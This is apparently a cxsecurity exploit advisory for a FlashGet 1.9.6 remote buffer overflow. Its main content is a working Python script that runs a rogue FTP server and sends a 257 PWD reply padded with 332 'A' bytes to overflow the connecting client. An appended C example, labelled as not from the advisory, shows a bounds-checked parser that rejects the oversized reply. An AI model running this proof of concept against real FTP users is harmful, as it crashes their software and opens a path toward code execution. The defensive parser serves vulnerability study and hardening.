FlashGet 1.9.6 0day Remote Buffer Overflow

2020.05.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python
# Exploit Title: FlashGet 1.9.6 0day Remote Buffer Overflow
# Date: 2020.05.02
# Author: Milad Karimi
# Tested on: Kali Linux
# Software Link: http://www.flashget.com/en/download.htm?uid=undefined
# Version: 1.9.6
# CVE : N/A

from time import sleep
from socket import *

# Canned FTP replies, sent in order; the 257 (PWD) reply carries the long string.
res = [
    '220 WELCOME!! :x\r\n',
    '331 Password required for %s.\r\n',
    '230 User %s logged in.\r\n',
    '250 CWD command successful.\r\n',
    '257 "%s/" is current directory.\r\n'  # <-- %s B0f :x
]

buf = 'A' * 332

s = socket(AF_INET, SOCK_STREAM)
s.bind(('0.0.0.0', 21))
s.listen(1)
print '[+] listening on [FTP] 21 ...\n'
c, addr = s.accept()
c.send(res[0])

user = ''
for i in range(1, len(res)):
    req = c.recv(1024)
    print '[*][CLIENT] %s' % (req)
    tmp = res[i]
    if(req.find('USER') != -1):
        req = req.replace('\r\n', '')
        user = req.split('\x20', 1)[1]
        tmp %= user
    if(req.find('PASS') != -1):
        tmp %= user
    if(req.find('PWD') != -1):
        # the directory name in the 257 reply is replaced by buf
        tmp %= buf
    print '[*][SERVER] %s' % (tmp)
    c.send(tmp)

sleep(5)
c.close()
s.close()
print '[+] DONE'

# Discovered By : Milad Karimi
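
The client-side mitigation for the oversized 257 reply sent by the script above, added here as an example and not taken from the advisory or from FlashGet's code: a bounds-checked parser that rejects an overlong directory string instead of copying it. The names parse_pwd_reply and PWD_MAX and the 260-byte limit are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define PWD_MAX 260 /* assumed client-side path limit, not from the page */
enum pwd_status { PWD_OK, PWD_BAD_CODE, PWD_BAD_SYNTAX, PWD_TOO_LONG };

/* Extract the quoted directory from a server-controlled FTP "257" reply
 * (RFC 959). Every write is bounds-checked; an oversized path is rejected
 * rather than truncated, and out is left empty on any failure. */
enum pwd_status parse_pwd_reply(const char *line, size_t len,
                                char *out, size_t outsz)
{
    size_t i = 5, n = 0;

    if (!line || !out || outsz == 0)
        return PWD_BAD_SYNTAX;
    out[0] = '\0';
    if (len < 4 || memcmp(line, "257 ", 4) != 0)
        return PWD_BAD_CODE;
    if (len < 5 || line[4] != '"')
        return PWD_BAD_SYNTAX;
    while (i < len && line[i] != '\r' && line[i] != '\n' && line[i] != '\0') {
        char ch = line[i++];
        if (ch == '"') {
            if (i >= len || line[i] != '"') { /* closing quote: done */
                out[n] = '\0';
                return PWD_OK;
            }
            i++; /* RFC 959: a doubled quote is one literal quote */
        }
        if (n + 1 >= outsz) { /* no room for this byte plus terminator */
            out[0] = '\0';
            return PWD_TOO_LONG;
        }
        out[n++] = ch;
    }
    out[0] = '\0'; /* line ended before the closing quote */
    return PWD_BAD_SYNTAX;
}

int main(void)
{
    /* Constructed input with the shape of the page's 257 reply. */
    char reply[512] = "257 \"", dir[PWD_MAX];
    memset(reply + 5, 'A', 332);
    strcpy(reply + 337, "/\" is current directory.\r\n");
    printf("status=%d\n", parse_pwd_reply(reply, strlen(reply), dir, sizeof dir));
    return 0;
}
```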


Copyright 2024, cxsecurity.com

 
